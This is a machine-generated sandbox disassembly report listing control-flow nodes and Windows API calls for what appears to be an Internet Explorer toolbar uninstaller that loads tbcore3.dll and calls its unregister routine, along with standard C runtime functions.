4121->4122 4123 6c5b51 4122->4123 4124 6c35ee ___free_lconv_num 66 API calls 4123->4124 4125 6c5b59 4124->4125 4126 6c35ee ___free_lconv_num 66 API calls 4125->4126 4127 6c5b61 4126->4127 4128 6c35ee ___free_lconv_num 66 API calls 4127->4128 4129 6c5b69 4128->4129 4130 6c35ee ___free_lconv_num 66 API calls 4129->4130 4131 6c5b71 4130->4131 4132 6c35ee ___free_lconv_num 66 API calls 4131->4132 4133 6c5b7c 4132->4133 4134 6c35ee ___free_lconv_num 66 API calls 4133->4134 4135 6c5b84 4134->4135 4136 6c35ee 
___free_lconv_num 66 API calls 4135->4136 4137 6c5b8c 4136->4137 4138 6c35ee ___free_lconv_num 66 API calls 4137->4138 4139 6c5b94 4138->4139 4140 6c35ee ___free_lconv_num 66 API calls 4139->4140 4141 6c5b9c 4140->4141 4142 6c35ee ___free_lconv_num 66 API calls 4141->4142 4143 6c5ba4 4142->4143 4144 6c35ee ___free_lconv_num 66 API calls 4143->4144 4145 6c5bac 4144->4145 4146 6c35ee ___free_lconv_num 66 API calls 4145->4146 4147 6c5bb4 4146->4147 4148 6c35ee ___free_lconv_num 66 API calls 4147->4148 4149 6c5bbc 4148->4149 4150 6c35ee ___free_lconv_num 66 API calls 4149->4150 4151 6c5bc4 4150->4151 4152 6c35ee ___free_lconv_num 66 API calls 4151->4152 4153 6c5bcc 4152->4153 4154 6c35ee ___free_lconv_num 66 API calls 4153->4154 4155 6c5bd4 4154->4155 4156 6c35ee ___free_lconv_num 66 API calls 4155->4156 4157 6c5bdc 4156->4157 4158 6c35ee ___free_lconv_num 66 API calls 4157->4158 4159 6c5be4 4158->4159 4160 6c35ee ___free_lconv_num 66 API calls 4159->4160 4161 6c5bec 4160->4161 4162 6c35ee ___free_lconv_num 66 API calls 4161->4162 4163 6c5bf4 4162->4163 4164 6c35ee ___free_lconv_num 66 API calls 4163->4164 4165 6c5c02 4164->4165 4166 6c35ee ___free_lconv_num 66 API calls 4165->4166 4167 6c5c0d 4166->4167 4168 6c35ee ___free_lconv_num 66 API calls 4167->4168 4169 6c5c18 4168->4169 4170 6c35ee ___free_lconv_num 66 API calls 4169->4170 4171 6c5c23 4170->4171 4172 6c35ee ___free_lconv_num 66 API calls 4171->4172 4173 6c5c2e 4172->4173 4174 6c35ee ___free_lconv_num 66 API calls 4173->4174 4175 6c5c39 4174->4175 4176 6c35ee ___free_lconv_num 66 API calls 4175->4176 4177 6c5c44 4176->4177 4178 6c35ee ___free_lconv_num 66 API calls 4177->4178 4179 6c5c4f 4178->4179 4180 6c35ee ___free_lconv_num 66 API calls 4179->4180 4181 6c5c5a 4180->4181 4182 6c35ee ___free_lconv_num 66 API calls 4181->4182 4183 6c5c65 4182->4183 4184 6c35ee ___free_lconv_num 66 API calls 4183->4184 4184->4185 4185->4054 4186->4029 4190 6c29c6 LeaveCriticalSection 4187->4190 4189 6c4142 4189->4008 
4190->4189 4192 6c4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4191->4192 4193 6c5ff5 4192->4193 4201 6c5e28 4193->4201 4196 6c6415 4197 6c4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4196->4197 4198 6c6428 4197->4198 4289 6c6070 4198->4289 4202 6c5e49 GetStringTypeW 4201->4202 4203 6c5e74 4201->4203 4204 6c5e69 GetLastError 4202->4204 4205 6c5e61 4202->4205 4203->4205 4206 6c5f5b 4203->4206 4204->4203 4207 6c5ead MultiByteToWideChar 4205->4207 4216 6c5f55 4205->4216 4229 6c6b1a GetLocaleInfoA 4206->4229 4211 6c5eda 4207->4211 4207->4216 4209 6c10cc ___ansicp 5 API calls 4212 6c3fae 4209->4212 4218 6c54b5 _malloc 66 API calls 4211->4218 4223 6c5eef __alloca_probe_16 __calloc_impl 4211->4223 4212->4196 4213 6c5fac GetStringTypeA 4213->4216 4217 6c5fc7 4213->4217 4215 6c5f28 MultiByteToWideChar 4220 6c5f3e GetStringTypeW 4215->4220 4221 6c5f4f 4215->4221 4216->4209 4222 6c35ee ___free_lconv_num 66 API calls 4217->4222 4218->4223 4220->4221 4225 6c5446 4221->4225 4222->4216 4223->4215 4223->4216 4226 6c5463 4225->4226 4227 6c5452 4225->4227 4226->4216 4227->4226 4228 6c35ee ___free_lconv_num 66 API calls 4227->4228 4228->4226 4230 6c6b4d 4229->4230 4231 6c6b48 4229->4231 4260 6c6b04 4230->4260 4233 6c10cc ___ansicp 5 API calls 4231->4233 4234 6c5f7f 4233->4234 4234->4213 4234->4216 4235 6c6b63 4234->4235 4236 6c6c2d 4235->4236 4237 6c6ba3 GetCPInfo 4235->4237 4240 6c10cc ___ansicp 5 API calls 4236->4240 4238 6c6c18 MultiByteToWideChar 4237->4238 4239 6c6bba 4237->4239 4238->4236 4244 6c6bd3 _strlen 4238->4244 4239->4238 4241 6c6bc0 GetCPInfo 4239->4241 4242 6c5fa0 4240->4242 4241->4238 4243 6c6bcd 4241->4243 4242->4213 4242->4216 4243->4238 4243->4244 4245 6c54b5 _malloc 66 API calls 4244->4245 4247 6c6c05 __alloca_probe_16 __calloc_impl 4244->4247 4245->4247 4246 6c6c62 MultiByteToWideChar 4248 6c6c7a 4246->4248 4257 6c6c99 4246->4257 4247->4236 4247->4246 4250 6c6c9e 4248->4250 4251 6c6c81 WideCharToMultiByte 4248->4251 4249 6c5446 __freea 66 API calls 
4249->4236 4252 6c6cbd 4250->4252 4253 6c6ca9 WideCharToMultiByte 4250->4253 4251->4257 4254 6c3730 __calloc_crt 66 API calls 4252->4254 4253->4252 4253->4257 4255 6c6cc5 4254->4255 4256 6c6cce WideCharToMultiByte 4255->4256 4255->4257 4256->4257 4258 6c6ce0 4256->4258 4257->4249 4259 6c35ee ___free_lconv_num 66 API calls 4258->4259 4259->4257 4263 6c6f7a 4260->4263 4264 6c6f93 4263->4264 4267 6c6d4b 4264->4267 4268 6c4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4267->4268 4270 6c6d60 4268->4270 4269 6c6d72 4271 6c2c72 __calloc_impl 66 API calls 4269->4271 4270->4269 4275 6c6daf 4270->4275 4272 6c6d77 4271->4272 4273 6c2c0a __calloc_impl 6 API calls 4272->4273 4276 6c6b15 4273->4276 4277 6c6df4 4275->4277 4279 6c69e5 4275->4279 4276->4231 4277->4276 4278 6c2c72 __calloc_impl 66 API calls 4277->4278 4278->4276 4280 6c4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4279->4280 4281 6c69f9 4280->4281 4282 6c6a06 4281->4282 4286 6c6acc 4281->4286 4282->4275 4285 6c5fe2 ___crtGetStringTypeA 90 API calls 4285->4282 4287 6c4144 _LocaleUpdate::_LocaleUpdate 76 API calls 4286->4287 4288 6c6a2e 4287->4288 4288->4285 4290 6c6091 LCMapStringW 4289->4290 4293 6c60ac 4289->4293 4291 6c60b4 GetLastError 4290->4291 4290->4293 4291->4293 4292 6c62aa 4296 6c6b1a ___ansicp 90 API calls 4292->4296 4293->4292 4294 6c6106 4293->4294 4295 6c611f MultiByteToWideChar 4294->4295 4319 6c62a1 4294->4319 4304 6c614c 4295->4304 4295->4319 4297 6c62d2 4296->4297 4300 6c62eb 4297->4300 4301 6c63c6 LCMapStringA 4297->4301 4297->4319 4298 6c10cc ___ansicp 5 API calls 4299 6c3fce 4298->4299 4299->3973 4302 6c6b63 ___convertcp 73 API calls 4300->4302 4335 6c6322 4301->4335 4307 6c62fd 4302->4307 4303 6c619d MultiByteToWideChar 4308 6c61b6 LCMapStringW 4303->4308 4330 6c6298 4303->4330 4306 6c54b5 _malloc 66 API calls 4304->4306 4313 6c6165 __alloca_probe_16 4304->4313 4305 6c63ed 4316 6c35ee ___free_lconv_num 66 API calls 4305->4316 4305->4319 4306->4313 4310 6c6307 LCMapStringA 4307->4310 4307->4319 
4312 6c61d7 4308->4312 4308->4330 4309 6c35ee ___free_lconv_num 66 API calls 4309->4305 4321 6c6329 4310->4321 4310->4335 4311 6c5446 __freea 66 API calls 4311->4319 4314 6c61e0 4312->4314 4320 6c6209 4312->4320 4313->4303 4313->4319 4318 6c61f2 LCMapStringW 4314->4318 4314->4330 4315 6c6224 __alloca_probe_16 4322 6c6258 LCMapStringW 4315->4322 4315->4330 4316->4319 4317 6c633a __alloca_probe_16 __calloc_impl 4328 6c6378 LCMapStringA 4317->4328 4317->4335 4318->4330 4319->4298 4320->4315 4326 6c54b5 _malloc 66 API calls 4320->4326 4321->4317 4323 6c54b5 _malloc 66 API calls 4321->4323 4324 6c6270 WideCharToMultiByte 4322->4324 4325 6c6292 4322->4325 4323->4317 4324->4325 4327 6c5446 __freea 66 API calls 4325->4327 4326->4315 4327->4330 4331 6c6398 4328->4331 4332 6c6394 4328->4332 4330->4311 4333 6c6b63 ___convertcp 73 API calls 4331->4333 4334 6c5446 __freea 66 API calls 4332->4334 4333->4332 4334->4335 4335->4305 4335->4309 4431 6c1281 4434 6c283c 4431->4434 4433 6c1286 4433->4433 4435 6c286e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 4434->4435 4436 6c2861 4434->4436 4437 6c2865 4435->4437 4436->4435 4436->4437 4437->4433 4336 6c1242 4337 6c1257 4336->4337 4338 6c1251 4336->4338 4342 6c16bc 4337->4342 4340 6c1697 _raise 66 API calls 4338->4340 4340->4337 4341 6c125c __calloc_impl 4343 6c1555 _doexit 66 API calls 4342->4343 4344 6c16c7 4343->4344 4344->4341 4395 6c543d 4396 6c1411 __amsg_exit 66 API calls 4395->4396 4397 6c5444 4396->4397 3899 6c28fe 3900 6c2901 3899->3900 3903 6c51fb 3900->3903 3904 6c521a 3903->3904 3905 6c5221 3903->3905 3906 6c1719 __NMSG_WRITE 66 API calls 3904->3906 3915 6c2f92 3905->3915 3906->3905 3909 6c5232 __calloc_impl 3911 6c530a 3909->3911 3914 6c52ca SetUnhandledExceptionFilter UnhandledExceptionFilter 3909->3914 3939 6c1697 3911->3939 3914->3911 3916 6c20f9 __decode_pointer 6 API calls 3915->3916 3917 6c2f9d 3916->3917 3917->3909 3918 6c2f9f 3917->3918 3921 6c2fab 
__calloc_impl 3918->3921 3919 6c3007 3920 6c2fe8 3919->3920 3925 6c3016 3919->3925 3924 6c20f9 __decode_pointer 6 API calls 3920->3924 3921->3919 3921->3920 3922 6c2fd2 3921->3922 3928 6c2fce 3921->3928 3923 6c22cc __getptd_noexit 66 API calls 3922->3923 3926 6c2fd7 _siglookup 3923->3926 3924->3926 3927 6c2c72 __calloc_impl 66 API calls 3925->3927 3930 6c307d 3926->3930 3932 6c1697 _raise 66 API calls 3926->3932 3938 6c2fe0 __calloc_impl 3926->3938 3929 6c301b 3927->3929 3928->3922 3928->3925 3931 6c2c0a __calloc_impl 6 API calls 3929->3931 3933 6c2aa0 __lock 66 API calls 3930->3933 3935 6c3088 3930->3935 3931->3938 3932->3930 3933->3935 3934 6c20f0 ___crtMessageBoxW 6 API calls 3936 6c30bd 3934->3936 3935->3934 3935->3936 3942 6c3113 3936->3942 3938->3909 3940 6c1555 _doexit 66 API calls 3939->3940 3941 6c16a8 3940->3941 3943 6c3119 3942->3943 3944 6c3120 3942->3944 3946 6c29c6 LeaveCriticalSection 3943->3946 3944->3938 3946->3944 4345 6c235f 4346 6c236b __calloc_impl 4345->4346 4347 6c2383 4346->4347 4348 6c246d __calloc_impl 4346->4348 4349 6c35ee ___free_lconv_num 66 API calls 4346->4349 4350 6c35ee ___free_lconv_num 66 API calls 4347->4350 4353 6c2391 4347->4353 4349->4347 4350->4353 4351 6c239f 4352 6c23ad 4351->4352 4355 6c35ee ___free_lconv_num 66 API calls 4351->4355 4356 6c23bb 4352->4356 4357 6c35ee ___free_lconv_num 66 API calls 4352->4357 4353->4351 4354 6c35ee ___free_lconv_num 66 API calls 4353->4354 4354->4351 4355->4352 4358 6c23c9 4356->4358 4359 6c35ee ___free_lconv_num 66 API calls 4356->4359 4357->4356 4360 6c23d7 4358->4360 4362 6c35ee ___free_lconv_num 66 API calls 4358->4362 4359->4358 4361 6c23e8 4360->4361 4363 6c35ee ___free_lconv_num 66 API calls 4360->4363 4364 6c2aa0 __lock 66 API calls 4361->4364 4362->4360 4363->4361 4365 6c23f0 4364->4365 4366 6c23fc InterlockedDecrement 4365->4366 4367 6c2415 4365->4367 4366->4367 4368 6c2407 4366->4368 4381 6c2479 4367->4381 4368->4367 4372 6c35ee ___free_lconv_num 66 API calls 4368->4372 4371 
6c2aa0 __lock 66 API calls 4373 6c2429 4371->4373 4372->4367 4374 6c245a 4373->4374 4375 6c3d2d ___removelocaleref 8 API calls 4373->4375 4384 6c2485 4374->4384 4379 6c243e 4375->4379 4378 6c35ee ___free_lconv_num 66 API calls 4378->4348 4379->4374 4380 6c3b55 ___freetlocinfo 66 API calls 4379->4380 4380->4374 4387 6c29c6 LeaveCriticalSection 4381->4387 4383 6c2422 4383->4371 4388 6c29c6 LeaveCriticalSection 4384->4388 4386 6c2467 4386->4378 4387->4383 4388->4386 4398 6c2d3f 4399 6c3730 __calloc_crt 66 API calls 4398->4399 4400 6c2d4b 4399->4400 4401 6c207e __encode_pointer 6 API calls 4400->4401 4402 6c2d53 4401->4402 4403 6c5138 4404 6c5158 @_EH4_CallFilterFunc@8 4403->4404 4405 6c514a 4403->4405 4406 6c10cc ___ansicp 5 API calls 4405->4406 4406->4404 4407 6c31b4 4408 6c31c0 SetLastError 4407->4408 4409 6c31c8 __calloc_impl 4407->4409 4408->4409 4410 6c26b0 4411 6c26dc 4410->4411 4412 6c26e9 4410->4412 4413 6c10cc ___ansicp 5 API calls 4411->4413 4414 6c10cc ___ansicp 5 API calls 4412->4414 4413->4412 4415 6c26f9 __except_handler4 __IsNonwritableInCurrentImage 4414->4415 4416 6c277c 4415->4416 4417 6c2752 __except_handler4 4415->4417 4426 6c51ca RtlUnwind 4415->4426 4417->4416 4418 6c276c 4417->4418 4419 6c10cc ___ansicp 5 API calls 4417->4419 4420 6c10cc ___ansicp 5 API calls 4418->4420 4419->4418 4420->4416 4422 6c27cb __except_handler4 4423 6c27ff 4422->4423 4424 6c10cc ___ansicp 5 API calls 4422->4424 4425 6c10cc ___ansicp 5 API calls 4423->4425 4424->4423 4425->4417 4426->4422 4438 6c1391 4439 6c13cd 4438->4439 4440 6c13a3 4438->4440 4440->4439 4442 6c28da 4440->4442 4443 6c28e6 __calloc_impl 4442->4443 4444 6c2345 __getptd 66 API calls 4443->4444 4445 6c28eb 4444->4445 4446 6c51fb _abort 68 API calls 4445->4446 4447 6c290d __calloc_impl 4446->4447 4447->4439

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 006C1006
                                                                                        • CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 006C1013
                                                                                        • GetLastError.KERNEL32 ref: 006C101F
                                                                                        • GetCommandLineW.KERNEL32(?), ref: 006C1040
                                                                                        • CommandLineToArgvW.SHELL32(00000000), ref: 006C1047
                                                                                        • PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 006C1061
                                                                                        • PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 006C1073
                                                                                        • LoadLibraryW.KERNELBASE(?), ref: 006C1085
                                                                                        • GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 006C1097
                                                                                        • FreeLibrary.KERNELBASE(00000000), ref: 006C10A4
                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 006C10AB
                                                                                        • CoUninitialize.COMBASE ref: 006C10B1
                                                                                        • LocalFree.KERNEL32(00000000), ref: 006C10BC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000002A.00000002.3251666953.00000000006C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 006C0000, based on PE: true
                                                                                        • Associated: 0000002A.00000002.3251627784.00000000006C0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                        • Associated: 0000002A.00000002.3251689620.00000000006C8000.00000002.00000001.01000000.0000000C.sdmp
                                                                                        • Associated: 0000002A.00000002.3251709708.00000000006CA000.00000004.00000001.01000000.0000000C.sdmp
                                                                                        • Associated: 0000002A.00000002.3251729622.00000000006CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_42_2_6c0000_pw8XjN.jbxd
                                                                                        Similarity
                                                                                        • API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
                                                                                        • String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
                                                                                        • API String ID: 474438367-4110843154

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 16 6c1465-6c1476 call 6c143a ExitProcess
                                                                                        APIs
                                                                                        • ___crtCorExitProcess.LIBCMT ref: 006C146D
                                                                                          • Part of subcall function 006C143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,006C1472,?,?,006C54EE,000000FF,0000001E,?,006C36FC,?,00000001,?,?,006C2A2A,00000018), ref: 006C1444
                                                                                          • Part of subcall function 006C143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006C1454
                                                                                        • ExitProcess.KERNEL32 ref: 006C1476
                                                                                        Similarity
                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                        • String ID:
                                                                                        • API String ID: 2427264223-0

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 19 6c261b-6c263d HeapCreate 20 6c263f-6c2640 19->20 21 6c2641-6c264a 19->21
                                                                                        APIs
                                                                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 006C2630
                                                                                        Similarity
                                                                                        • API ID: CreateHeap
                                                                                        • String ID:
                                                                                        • API String ID: 10892065-0

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 22 6c1681-6c168d call 6c1555 24 6c1692-6c1696 22->24
                                                                                        APIs
                                                                                        • _doexit.LIBCMT ref: 006C168D
                                                                                          • Part of subcall function 006C1555: __lock.LIBCMT ref: 006C1563
                                                                                          • Part of subcall function 006C1555: __decode_pointer.LIBCMT ref: 006C159A
                                                                                          • Part of subcall function 006C1555: __decode_pointer.LIBCMT ref: 006C15AF
                                                                                          • Part of subcall function 006C1555: __decode_pointer.LIBCMT ref: 006C15D9
                                                                                          • Part of subcall function 006C1555: __decode_pointer.LIBCMT ref: 006C15EF
                                                                                          • Part of subcall function 006C1555: __decode_pointer.LIBCMT ref: 006C15FC
                                                                                          • Part of subcall function 006C1555: __initterm.LIBCMT ref: 006C162B
                                                                                          • Part of subcall function 006C1555: __initterm.LIBCMT ref: 006C163B
                                                                                        Similarity
                                                                                        • API ID: __decode_pointer$__initterm$__lock_doexit
                                                                                        • String ID:
                                                                                        • API String ID: 1597249276-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • IsDebuggerPresent.KERNEL32 ref: 006C1346
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006C135B
                                                                                        • UnhandledExceptionFilter.KERNEL32(006C816C), ref: 006C1366
                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 006C1382
                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 006C1389
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 2579439406-0

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,006C9458,0000000C,006C2320,00000000,00000000,?,006C174F,00000003,?,?,?,?,?,?,006C10F6), ref: 006C21F7
                                                                                        • __crt_waiting_on_module_handle.LIBCMT ref: 006C2202
                                                                                          • Part of subcall function 006C13E1: Sleep.KERNEL32(000003E8,00000000,?,006C2148,KERNEL32.DLL,?,006C2194,?,006C174F,00000003), ref: 006C13ED
                                                                                          • Part of subcall function 006C13E1: GetModuleHandleW.KERNEL32(?,?,006C2148,KERNEL32.DLL,?,006C2194,?,006C174F,00000003,?,?,?,?,?,?,006C10F6), ref: 006C13F6
                                                                                        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 006C222B
                                                                                        • GetProcAddress.KERNEL32(?,DecodePointer), ref: 006C223B
                                                                                        • __lock.LIBCMT ref: 006C225D
                                                                                        • InterlockedIncrement.KERNEL32(006CA4D8), ref: 006C226A
                                                                                        • __lock.LIBCMT ref: 006C227E
                                                                                        • ___addlocaleref.LIBCMT ref: 006C229C
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                        • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                        • API String ID: 1028249917-2843748187

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 170 6c40a0-6c40bb call 6c264c call 6c2345 175 6c40bd-6c40c1 170->175 176 6c40da-6c40f2 call 6c2aa0 170->176 175->176 178 6c40c3 175->178 181 6c412a-6c4136 call 6c413b 176->181 182 6c40f4-6c40f6 176->182 180 6c40c6-6c40c8 178->180 183 6c40ca-6c40d1 call 6c1411 180->183 184 6c40d2-6c40d9 call 6c2691 180->184 181->180 185 6c40f8-6c4101 InterlockedDecrement 182->185 186 6c4112-6c4124 InterlockedIncrement 182->186 183->184 185->186 191 6c4103-6c4109 185->191 186->181 191->186 194 6c410b-6c4111 call 6c35ee 191->194 194->186
                                                                                        APIs
                                                                                        • __getptd.LIBCMT ref: 006C40AC
                                                                                          • Part of subcall function 006C2345: __getptd_noexit.LIBCMT ref: 006C2348
                                                                                          • Part of subcall function 006C2345: __amsg_exit.LIBCMT ref: 006C2355
                                                                                        • __amsg_exit.LIBCMT ref: 006C40CC
                                                                                        • __lock.LIBCMT ref: 006C40DC
                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 006C40F9
                                                                                        • InterlockedIncrement.KERNEL32(023A2AE0), ref: 006C4124
                                                                                        Similarity
                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                        • String ID:
                                                                                        • API String ID: 4271482742-0

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 197 6c35ee-6c35ff call 6c264c 200 6c3676-6c367b call 6c2691 197->200 201 6c3601-6c3608 197->201 203 6c364d 201->203 204 6c360a-6c3622 call 6c2aa0 call 6c45e4 201->204 206 6c364e-6c365e HeapFree 203->206 214 6c362d-6c363d call 6c3644 204->214 215 6c3624-6c362c call 6c4614 204->215 206->200 208 6c3660-6c3675 call 6c2c72 GetLastError call 6c2c30 206->208 208->200 214->200 222 6c363f-6c3642 214->222 215->214 222->206
                                                                                        APIs
                                                                                        • __lock.LIBCMT ref: 006C360C
                                                                                          • Part of subcall function 006C2AA0: __mtinitlocknum.LIBCMT ref: 006C2AB6
                                                                                          • Part of subcall function 006C2AA0: __amsg_exit.LIBCMT ref: 006C2AC2
                                                                                          • Part of subcall function 006C2AA0: EnterCriticalSection.KERNEL32(?,?,?,006C5600,00000004,006C9628,0000000C,006C3746,?,?,00000000,00000000,00000000,?,006C22F7,00000001), ref: 006C2ACA
                                                                                        • ___sbh_find_block.LIBCMT ref: 006C3617
                                                                                        • ___sbh_free_block.LIBCMT ref: 006C3626
                                                                                        • HeapFree.KERNEL32(00000000,?,006C9568,0000000C,006C2A81,00000000,006C94C8,0000000C,006C2ABB,?,?,?,006C5600,00000004,006C9628,0000000C), ref: 006C3656
                                                                                        • GetLastError.KERNEL32(?,006C5600,00000004,006C9628,0000000C,006C3746,?,?,00000000,00000000,00000000,?,006C22F7,00000001,00000214), ref: 006C3667
                                                                                        Similarity
                                                                                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 2714421763-0

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 223 6c3e04-6c3e1f call 6c264c call 6c2345 228 6c3e21-6c3e25 223->228 229 6c3e43-6c3e6c call 6c2aa0 call 6c3dc6 call 6c3e6e 223->229 228->229 230 6c3e27-6c3e2c call 6c2345 228->230 236 6c3e2f-6c3e31 229->236 230->236 239 6c3e3b-6c3e42 call 6c2691 236->239 240 6c3e33-6c3e3a call 6c1411 236->240 240->239
                                                                                        APIs
                                                                                        • __getptd.LIBCMT ref: 006C3E10
                                                                                          • Part of subcall function 006C2345: __getptd_noexit.LIBCMT ref: 006C2348
                                                                                          • Part of subcall function 006C2345: __amsg_exit.LIBCMT ref: 006C2355
                                                                                        • __getptd.LIBCMT ref: 006C3E27
                                                                                        • __amsg_exit.LIBCMT ref: 006C3E35
                                                                                        • __lock.LIBCMT ref: 006C3E45
                                                                                        Similarity
                                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                        • String ID:
                                                                                        • API String ID: 3521780317-0